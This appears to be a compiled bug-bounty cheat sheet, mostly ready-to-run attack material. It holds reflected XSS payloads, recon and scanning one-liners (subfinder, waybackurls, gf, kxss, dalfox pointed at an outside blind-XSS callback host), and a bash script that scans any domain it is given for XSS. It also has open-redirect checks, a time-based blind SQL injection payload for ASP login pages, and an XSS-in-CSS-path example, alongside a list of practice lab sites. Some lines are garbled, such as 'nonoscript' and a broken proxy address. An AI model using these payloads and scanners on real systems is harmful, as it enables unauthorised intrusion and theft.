Top 3 RXSS payloads

`'";//><img/src=x onError="${x};alert(`1`);">

`'";//><Img Src=a OnError=location=src>

`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>

Simple Reflected XSS

1. subfinder -d target .com | httprobe -c 100 > target.txt
2. cat target.txt | waybackurls | gf xss | kxxs

For Automation Reflected XSS Scanning

#!/bin/bash

# Prompt user for domain input
read -p "Enter the domain you want to scan: " domain

# Define output file
output_file="scan_output.txt"

# Run subfinder to find subdomains, filter through httprobe, and save to target.txt
echo "Finding subdomains for $domain..."
subfinder -d $domain | httprobe -c 100 > target.txt

# Use waybackurls to find URLs from Wayback Machine, filter through gf for XSS, and scan with kxxs
echo "Scanning for XSS vulnerabilities..."
cat target.txt | waybackurls | gf xss | kxxs >> "$output_file"

# Display output file location
echo "Scan output saved to $output_file"

🚨Toxicache🚨
👉Golang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
🔗https://lnkd.in/gdtpJGmT

Awesome Bug Bounty One-liners

A collection of awesome one-liner noscripts especially for bug bounty.

Open-redirect

Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0. .1:8080 -sk > /dev/null

XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt

Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

📚 Repositories:
1. https://lnkd.in/dMBdxSQD

2. https://lnkd.in/ebTrAP8y

3. https://lnkd.in/dmG4G3ea

4. https://lnkd.in/dXxHMUu9

Useful XSS payloads:

"/*\"/*`/*' /*</template> </textarea></noembed></nonoscript></noscript> </style></noscript>-->&lt;noscript onload=/*<html/*/onmouseover=alert()//>

data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTIGJ5IFZpY2tpZScpPC9zY3JpcHQ+"

data:text/html,<noscript>alert(1)</noscript>

<select><noembed></select><noscript x='a@b'a>

Cyber Security Lab Practice, RED & BLUE Team.

🌀Attack-Defense - https://attackdefense.com
🌀Alert to win - https://aalf.nu/alert1
🌀Bancocn - https://bancocn.com
🌀Buffer Overflow Labs - https://lnkd.in/eNbEWYh
🌀CTF Komodo Security - https://ctf.komodosec.com
🌀CryptoHack - https://cryptohack.org/
🌀CMD Challenge - https://cmdchallenge.com
🌀Explotation Education - https://exploit.education
🌀Google CTF - https://lnkd.in/e46drbz8
🌀HackTheBox - Dr. AITH - https://www.hackthebox.com
🌀Hackthis - https://www.hackthis.co.uk
🌀Hacksplaining - https://lnkd.in/eAB5CSTA
🌀Hacker101 - https://ctf.hacker101.com
🌀Capture The Flag - Hacker Security - https://lnkd.in/ex7R-C-e
🌀Hacking-Lab - https://hacking-lab.com/
🌀ImmersiveLabs - https://immersivelabs.com
🌀NewbieContest - https://lnkd.in/ewBk6fU5
🌀OverTheWire - http://overthewire.org
🌀Practical Pentest Labs - https://lnkd.in/esq9Yuv5
🌀Pentestlab - https://pentesterlab.com
🌀Penetration Testing Practice Labs - https://lnkd.in/e6wVANYd
🌀PentestIT LAB - https://lab.pentestit.ru
🌀PicoCTF - https://picoctf.com
🌀PWNABLE - https://lnkd.in/eMEwBJzn
🌀Root-Me - https://www.root-me.org
🌀Root in Jail - http://rootinjail.com
🌀SANS Challenger - https://lnkd.in/e5TAMawK
🌀SmashTheStack - https://lnkd.in/eVn9rP9p
🌀The Cryptopals Crypto Challenges - https://cryptopals.com
🌀Try Hack Me - https://tryhackme.com
🌀Vulnhub - https://www.vulnhub.com
🌀Vulnmachine - https://lnkd.in/eJ2e_kD
🌀W3Challs - https://w3challs.com
🌀WeChall - http://www.wechall.net
🌀Websploit - https://websploit.org/
🌀Zenk-Security - https://lnkd.in/ewJ5rNx2
🌀Cyberdefenders - https://lnkd.in/dVcmjEw8
🌀LetsDefend- https://letsdefend.io/

Tricky ASP blind SQL Injection in a login page.
Payload👇
';%20waitfor%20delay%20'0:0:6'%20--%20

XSS in the .css URL path

Original url: "target/lib/css/animated.min.css"

XSS Found in:
"/lib/css/animated.min'"/><noscript%20>alert(document.domain)<%2fnoscript>.css"